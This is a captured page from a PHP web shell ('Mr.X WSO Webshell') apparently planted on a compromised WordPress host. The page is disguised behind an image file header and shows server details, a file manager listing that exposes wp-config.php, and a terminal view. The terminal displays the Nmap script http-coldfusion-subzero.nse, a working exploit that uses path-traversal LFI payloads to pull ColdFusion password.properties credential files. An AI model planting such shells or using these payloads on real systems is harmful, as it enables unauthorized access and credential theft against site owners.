����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:		Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-08 23:38:21
1999.30 GB Free: 82.88 GB (4%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-08 23:36:09drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-08 17:17:21drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /usr/share/nmap/scripts/
Upload Files
File: //usr/share/nmap/scripts/http-coldfusion-subzero.nse
description = [[
Attempts to retrieve version, absolute path of administration panel and the file 'password.properties' in vulnerable installations of ColdFusion 9 and 10.

This was based on the exploit 'ColdSub-Zero.pyFusion v2'.
]]

---
-- @usage nmap -sV --script http-coldfusion-subzero <target>
-- @usage nmap -p80 --script http-coldfusion-subzero --script-args basepath=/cf/ <target>
-- 
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-coldfusion-subzero: 
-- |   absolute_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
-- |   version: 9
-- |   password_properties: #Fri Mar 02 17:03:01 CST 2012
-- | rdspassword=
-- | password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
-- |_encrypted=true
--
-- @xmloutput
-- <script id="http-coldfusion-subzero" output="&#xa;  installation_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags&#xa;  version: 9&#xa;  password_properties: #Fri Mar 02 17:03:01 CST 2012&#xd;&#xa;rdspassword=&#xd;&#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&#xd;&#xa;encrypted=true&#xd;&#xa;"><elem key="installation_path">C:\inetpub\wwwroot\CFIDE\adminapi\customtags</elem>
-- <elem key="version">9</elem>
-- <elem key="password_properties">#Fri Mar 02 17:03:01 CST 2012&#xd;&#xa;rdspassword=&#xd;&#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&#xd;&#xa;encrypted=true&#xd;&#xa;</elem>
-- </script>
-- @args http-coldfusion-subzero.basepath Base path. Default: /.
--
---

author = "Paulino Calderon <calderon@websec.mx>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit"}

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local url = require "url"

portrule = shortport.http

local PATH_PAYLOAD = "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp"
local IMG_PAYLOAD = "CFIDE/administrator/images/loginbackground.jpg"
local LFI_PAYLOAD_FRAG_1 = "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename="
local LFI_PAYLOAD_FRAG_2 = "&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp"
local CREDENTIALS_PAYLOADS = {
  "../../lib/password.properties",
  "..\\..\\lib\\password.properties",
  "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\lib\\password.properties",
  "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\cfusion\\lib\\password.properties",
  "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties",
  "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\lib\\password.properties",
  "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\cfusion\\lib\\password.properties",
  "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
  "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties",
  "../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties"
}

---
-- Extracts absolute path of installation by reading the ANALIZER_DIRECTORY value from the header 'set-cookie'
--
local function get_installation_path(host, port, basepath)
  local req = http.get(host, port, basepath..PATH_PAYLOAD)
  if req.header['set-cookie'] then
    stdnse.print_debug(1, "%s:Header 'set-cookie' detected in response.", SCRIPT_NAME)
    local _, _, path = string.find(req.header['set-cookie'], "path=/, ANALYZER_DIRECTORY=(.-);path=/")
    if path then
      stdnse.print_debug(1, "%s: Extracted path:%s", SCRIPT_NAME, path)
      return path
    end
  end
  return nil
end

---
-- Extracts version by comparing an image with known md5 checksums
--
local function get_version(host, port, basepath)
  local version = -1
  local img_req = http.get(host, port, basepath..IMG_PAYLOAD)
  if img_req.status == 200 then
    local md5chk = stdnse.tohex(openssl.md5(img_req.body))
    if md5chk == "a4c81b7a6289b2fc9b36848fa0cae83c" then
      stdnse.print_debug(1, "%s:CF version 10 detected.", SCRIPT_NAME)
      version = 10
    elseif md5chk == "596b3fc4f1a0b818979db1cf94a82220" then
      stdnse.print_debug(1, "%s:CF version 9 detected.", SCRIPT_NAME)
      version = 9
    elseif md5chk == "" then
      stdnse.print_debug(1, "%s:CF version 8 detected.", SCRIPT_NAME)
      version = 8
    else 
      stdnse.print_debug(1, "%s:Could not determine version.", SCRIPT_NAME)
      version = nil
    end
  end
  return version
end

---
-- Sends malicious payloads to exploit a LFI vulnerability and extract the credentials
local function exploit(host, port, basepath)
  for i, vector in ipairs(CREDENTIALS_PAYLOADS) do
    local req = http.get(host, port, basepath..LFI_PAYLOAD_FRAG_1..vector..LFI_PAYLOAD_FRAG_2)
      if req.body and string.find(req.body, "encrypted=true") then
        stdnse.print_debug(1, "%s: String pattern found. Exploitation worked with vector '%s'.", SCRIPT_NAME, vector)
        return true, req.body
      end
  end
end

action = function(host, port)
  local output_tab = stdnse.output_table()
  local basepath = stdnse.get_script_args(SCRIPT_NAME..".basepath") or "/"

  local installation_path = get_installation_path(host, port, basepath)
  local version_num = get_version(host, port, basepath)
  local status, file = exploit(host, port, basepath)

  if status then
    if version_num then
      output_tab.version = version_num
    end
    if installation_path then
      output_tab.installation_path = url.unescape(installation_path)
    end
    output_tab.password_properties = file
  else
    return nil
  end

  return output_tab
end
@ Telegram